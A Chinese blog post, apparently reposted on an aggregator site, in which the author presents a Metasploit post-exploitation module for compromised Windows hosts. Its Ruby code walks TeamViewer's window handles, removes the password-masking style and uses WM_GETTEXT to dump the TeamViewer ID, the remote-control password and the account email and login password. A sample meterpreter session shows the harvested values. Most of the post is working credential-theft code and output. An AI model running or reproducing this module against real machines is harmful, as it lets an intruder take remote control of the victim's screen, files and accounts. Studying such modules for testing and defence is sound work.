Get TeamViewer ID and Password

Kali-Team

Dump TeamViewer ID and Password

前言

有时候会遇到目标主机安装有TeamViewer,在这种情况下一般会上传一个编译好的程序读取ID和控制密码,这样就可以连接上TeamViewer进而控制目标主机的屏幕操作,管理文件和连接VPN等等。

Metasploit中没有模块可以读取TeamViewer的ID和控制密码。我决定创建一个Metasploit模块,这个模块可以读取Teamviewer的ID和控制密码,如果登录窗口存在密码还会读取Email和登录密码。

怎么做

首先,这个模块使用了Metasploit中的Railgun功能,加载Windows内置动态链接库中的User32.dll并调用一些窗口函数,通过枚举窗口的信息,找到ID和控制密码的编辑框的句柄,然后发送Windows消息得到编辑框里的文本内容。

获取Teamviewer的主窗口句柄,一开始是通过FindWindows函数查找窗口标题得到窗口的句柄,但是在不同的主机里的系统语言可能不一样,这里考虑了兼容性,所以我使用了读取注册表"HKEY_CURRENT_USER\\Software\\TeamViewer"中的MainWindowHandle值作为主窗口的句柄。

获取ID和控制密码的代码:

# EnumWindows Function not work in RailGun, I don\'t know how to define the lpEnumFunc parameter
def enum_id_and_password(hwnd_main)
  hwnd_mwrcp = client.railgun.user32.FindWindowExW(hwnd_main, nil, \'MainWindowRemoteControlPage\', nil)
  hwnd_irccv = client.railgun.user32.FindWindowExW(hwnd_mwrcp[\'return\'], nil, \'IncomingRemoteControlComponentView\', nil)
  hwnd_custom_runner_id = client.railgun.user32.FindWindowExW(hwnd_irccv[\'return\'], nil, \'CustomRunner\', nil)
  hwnd_custom_runner_pass = client.railgun.user32.FindWindowExW(hwnd_irccv[\'return\'], hwnd_custom_runner_id[\'return\'], \'CustomRunner\', nil)
  #  find edit box handle
  hwnd_id_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_id[\'return\'], nil, \'Edit\', nil)
  print_status("Found handle to ID edit box #{hwnd_id_edit_box[\'return\'].to_s(16).rjust(8, \'0\')}")
  hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_custom_runner_pass[\'return\'], nil, \'Edit\', nil)
  print_status("Found handle to Password edit box #{hwnd_pass_edit_box[\'return\'].to_s(16).rjust(8, \'0\')}")
  #  get window text
  if hwnd_id_edit_box[\'return\'] && hwnd_pass_edit_box[\'return\']
    print_good("ID: #{get_window_text(hwnd_id_edit_box[\'return\'])}")
    print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box[\'return\'])}")
  else
    print_error(\'Handle for TeamViewer ID or password edit box not found\')
  end
end

获取Email和登录密码的代码:

def enum_email_and_password(hwnd_main)
  hwnd_lp = client.railgun.user32.FindWindowExW(hwnd_main, nil, \'LoginPage\', nil)
  hwnd_lfv = client.railgun.user32.FindWindowExW(hwnd_lp[\'return\'], nil, \'LoginFormView\', nil)
  #  find edit box handle
  hwnd_email_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv[\'return\'], nil, \'Edit\', nil)
  print_status("Found handle to Email edit box #{hwnd_email_edit_box[\'return\'].to_s(16).rjust(8, \'0\')}")
  hwnd_pass_edit_box = client.railgun.user32.FindWindowExW(hwnd_lfv[\'return\'], hwnd_email_edit_box[\'return\'], \'Edit\', nil)
  print_status("Found handle to Password edit box #{hwnd_pass_edit_box[\'return\'].to_s(16).rjust(8, \'0\')}")
  #  Remove ES_PASSWORD style
  #  https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongw
  #  https://docs.microsoft.com/en-us/windows/win32/controls/edit-control-styles
  #  GWL_STYLE  -16
  client.railgun.user32.SetWindowWord(hwnd_pass_edit_box[\'return\'], -16, 0)
  #  get window text
  if hwnd_email_edit_box[\'return\'] && hwnd_pass_edit_box[\'return\']
    print_good("EMAIL: #{get_window_text(hwnd_email_edit_box[\'return\'])}")
    print_good("PASSWORD: #{get_window_text(hwnd_pass_edit_box[\'return\'])}")
  else
    print_error(\'Handle for TeamViewer ID or Password edit box not found\')
  end
end

因为再Railgun中EnumChildWindows有一个参数是要重载EnumChildProc方法的,Metasploit做不到,也不是做不到,应该说比较麻烦,要在进程中申请一段有执行权限的内存,再把这个函数的shellcode写到这个地址,才能使用EnumChildWindows去调用这个方法,所以我就换为了FindWindowExW一层一层的找,还好Teamviewer编辑框的窗口类名都是不变的,使得这个方法可行。

找到编辑框的句柄之后就要获取编辑框里面的内容了,用C语言可以调用GetWindowTextW函数,但是在Metasploit又是行不通的,Railgun中这个函数有一个lpString参数是返回值,目前我还没找到调用他的方法。

所以我写了一个函数获取Windows标题:

def get_window_text(window_hwnd)
  if window_hwnd
    addr = session.railgun.util.alloc_and_write_wstring(\'Kali-Team\')
    client.railgun.user32.SendMessageW(window_hwnd, \'WM_GETTEXT\', 1024, addr)
    text = session.railgun.util.read_wstring(addr)
    client.railgun.multi([
      [\'kernel32\', \'VirtualFree\', [addr, 0, MEM_RELEASE]],
    ])
    if text == \'\'
      return \'The content of this edit box is empty\'
    else
      return text
    end
  else
    return nil
  end
end

模块使用

当你得到一个meterpreter会话的时候,可以直接执行该模块

meterpreter > run post/windows/gather/credentials/teamviewer_id_pwd 

[*] TeamViewer\'s language setting options are \'en\'
[*] TeamViewer\'s version is \'15.3.2682 \'
[+] The PID of TeamViewer\'s process has been found to be  3188.
[+] TeamViewer\'s  title is \'TeamViewer\'
[*] Found handle to ID edit box 00010596
[*] Found handle to Password edit box 0001059c
[+] ID: 1 561 912 659
[+] PASSWORD: 718xuu
[*] Found handle to Email edit box 0001054c
[*] Found handle to Password edit box 00010554
[+] EMAIL: kali-team@qq.com
[+] PASSWORD: MyPassword.
meterpreter >

分类:

技术点:

相关文章:

猜你喜欢
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode